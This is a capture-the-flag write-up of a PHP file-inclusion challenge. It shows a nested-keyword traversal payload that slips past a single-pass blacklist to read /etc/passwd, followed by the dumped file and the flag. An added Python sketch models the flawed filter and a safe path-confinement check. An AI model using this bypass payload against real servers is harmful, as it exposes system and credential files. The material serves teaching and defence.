A file inclusion challenge

The task is to read /etc/passwd.

Entering the following in the browser: http://183.213.11.*:4414/stage/11/getfilecontent.php?file=./index.txt

The browser shows (the resolved path echoed back, followed by the file's contents): /var/www/stage/11/index.txthalou

After some testing, the filtered keywords turned out to be:

./ ? ? etc passwd ?c/p

Therefore, applying the "sensitive word" trick (the author writes it as 敏敏感詞感詞: nest one copy of a filtered keyword inside another, so that after the filter strips one occurrence in a single non-recursive pass the keyword is left behind), the payload is constructed as follows:

getfilecontent.php?file=...//...//...//...//etetcc/c/ppasspasswdwd

The browser shows the following, which contains the key:

/var/www/stage/11/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:112::/home/ntp:/bin/false
Debian-exim:x:107:113::/var/spool/exim4:/bin/false
avahi:x:108:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
beef-xss:x:109:117::/var/lib/beef-xss:/bin/false
dradis:x:110:119::/var/lib/dradis:/bin/false
pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:113:122:Hardware abstraction layer,,,:/var/run/hald:/bin/false
iodine:x:114:65534::/var/run/iodine:/bin/false
postgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
stunnel4:x:117:126::/var/run/stunnel4:/bin/false
statd:x:118:65534::/var/lib/nfs:/bin/false
sslh:x:119:128::/nonexistent:/bin/false
Debian-gdm:x:120:129:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:121:130:RealtimeKit,,,:/proc:/bin/false
saned:x:122:131::/home/saned:/bin/false
snmp:x:123:132::/var/lib/snmp:/bin/false
Key:2986372947239ABC
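As an added illustration (not code from the original writeup or the challenge), here is a Python model of the keyword-stripping filter the writeup infers, assuming the blacklist is exactly the four readable keywords applied in order like PHP str_replace() and that the script's base directory is /var/www/stage/11. It shows why the nested payload survives a single non-recursive pass, and how a normalise-then-confine check, which needs no blacklist at all, rejects the resulting traversal.

```python
import posixpath
from typing import Optional

# Keywords the writeup found (the two unreadable entries are omitted); assumed to
# be stripped like PHP str_replace(): one non-recursive pass per keyword, in order.
BLACKLIST = ["./", "etc", "passwd", "c/p"]
BASE_DIR = "/var/www/stage/11"  # assumed directory getfilecontent.php reads from


def weak_filter(name: str) -> str:
    """Blacklist stripping as the challenge appears to do it.

    Each keyword is removed in a single left-to-right pass, so the text that is
    left behind by a removal is never rescanned: "...//" -> "../" and
    "etetcc" -> "etc" survive."""
    for kw in BLACKLIST:
        name = name.replace(kw, "")
    return name


def weak_resolve(name: str) -> str:
    """Path the vulnerable endpoint effectively opens: base dir + filtered name."""
    return posixpath.normpath(posixpath.join(BASE_DIR, weak_filter(name)))


def safe_resolve(name: str) -> Optional[str]:
    """Hardened lookup: normalise first, then require the result to stay inside
    BASE_DIR. Returns None for anything that escapes (".." chains or absolute
    paths). On a real filesystem use os.path.realpath() as well, so symlinks
    inside BASE_DIR cannot point back out."""
    target = posixpath.normpath(posixpath.join(BASE_DIR, name))
    if target != BASE_DIR and not target.startswith(BASE_DIR + "/"):
        return None
    return target


def filter_altered_input(name: str) -> bool:
    """Detection hook: if stripping changed the input at all, the request was
    probing the filter. Log it and refuse, rather than serving the remainder."""
    return weak_filter(name) != name


if __name__ == "__main__":
    payload = "...//...//...//...//etetcc/c/ppasspasswdwd"  # from the writeup
    print(weak_filter(payload))              # ../../../../etc/passwd
    print(weak_resolve(payload))             # /etc/passwd
    print(safe_resolve(weak_filter(payload)))  # None
    print(safe_resolve("./index.txt"))       # /var/www/stage/11/index.txt
```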
